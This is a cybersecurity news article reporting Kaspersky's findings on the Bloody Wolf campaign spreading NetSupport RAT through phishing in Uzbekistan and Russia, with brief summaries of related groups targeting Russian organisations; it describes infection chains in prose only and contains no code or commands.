Cybersecurity researchers have linked a targeted cyber campaign to the threat actor known as Bloody Wolf, which is actively infecting systems in Uzbekistan and Russia through spear-phishing emails that deliver the NetSupport Remote Access Trojan.
The activity is being monitored by cybersecurity firm Kaspersky under the tracking name Stan Ghouls. The group has been operational since at least 2023 and has a history of targeting organizations in the manufacturing, financial, and information technology sectors across Russia, Kyrgyzstan, Kazakhstan, and Uzbekistan.
Scale and Geographic Spread of the Campaign
Investigators estimate that approximately 50 victims have been affected in Uzbekistan, while at least 10 compromised devices have been confirmed in Russia. Smaller numbers of infections have also been observed in Kazakhstan, Turkey, Serbia, and Belarus.
Attack attempts were not limited to private enterprises. Devices within government bodies, logistics firms, healthcare facilities, and educational institutions were also targeted during the campaign.
According to Kaspersky, the focus on financial organizations suggests that monetary gain is likely the primary motivation. However, the extensive use of remote access trojans also raises the possibility of espionage related objectives.
Shift in Malware Strategy
The use of NetSupport RAT marks a notable change in Bloody Wolf’s tactics. In earlier operations, the group relied on STRRAT, also known as Strigoi Master. In November 2025, Group-IB documented phishing activity targeting organizations in Kyrgyzstan that distributed the same remote administration tool.
NetSupport is a legitimate remote management application, but threat actors frequently abuse it to maintain covert access to infected systems.
Infection Chain and Execution Flow
The attack chain begins with phishing emails that carry malicious PDF attachments. These documents contain embedded links that redirect victims to download a malicious loader once clicked.
The loader performs several actions in sequence. It first displays a fake error message to convince the victim that the file cannot be executed. It then checks whether previous installation attempts of the RAT are fewer than three. If the limit is exceeded, the loader halts execution and displays an error indicating that the attempt limit has been reached.
If allowed to proceed, the loader downloads NetSupport RAT from external domains and launches it. Persistence is achieved through multiple mechanisms, including Startup folder scripts, Registry autorun entries using a batch file named run.bat, and scheduled tasks that ensure repeated execution.
Possible Expansion into IoT Malware
Kaspersky researchers also identified Mirai botnet payloads hosted on infrastructure associated with Bloody Wolf. This discovery suggests that the threat actor may be expanding its capabilities to include attacks on Internet of Things devices.
With more than 60 confirmed targets, analysts describe the campaign as unusually large for a focused and well planned operation, indicating significant investment and operational capacity.
Related Threat Activity in Russia
The disclosure follows several other cyber campaigns aimed at Russian organizations. One such actor, ExCobalt, has been observed exploiting known vulnerabilities and using credentials stolen from contractors to gain initial access to corporate networks. Positive Technologies has classified ExCobalt as one of the most dangerous groups currently targeting Russian entities.
These attacks involve multiple tools and techniques, including attempts to steal Telegram credentials and message histories, as well as Outlook Web Access credentials through malicious code injection.
Tools linked to these campaigns include the CobInt backdoor, ransomware families such as Babuk and LockBit, and PUMAKIT, a kernel level rootkit designed to hide malicious activity and escalate privileges. Earlier versions of PUMAKIT were known as Facefish, Kitsune, and Megatsune. The Kitsune variant was previously linked by BI.ZONE to a separate threat cluster called Sneaky Wolf.
Another tool, Octopus, written in Rust, has been used to elevate privileges on compromised Linux systems.
Positive Technologies noted that attackers have shifted their initial access strategy away from exploiting internet facing corporate services and are now focusing on breaching primary targets indirectly through their contractors.
Emerging Threat Actors and New Campaigns
Russian state institutions, research organizations, and IT companies have also been targeted by a newly identified threat actor known as Punishing Owl. Active since December 2025, the group is suspected to be politically motivated and has leaked stolen data on dark web platforms. One of its social media accounts appears to be operated from Kazakhstan.
Punishing Owl’s attacks rely on phishing emails containing password protected ZIP files. These archives include Windows shortcut files disguised as PDF documents. When opened, the shortcut triggers a PowerShell command that downloads a data stealing malware called ZipWhisper, which exfiltrates sensitive information to a remote server.
Another campaign targeting Russia and Belarus has been attributed to a group known as Vortex Werewolf. The attackers aim to deploy Tor and OpenSSH to establish long term remote access. This activity was previously documented in November 2025 by Cyble and Seqrite Labs, with the latter referring to the operation as Operation SkyCloak.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
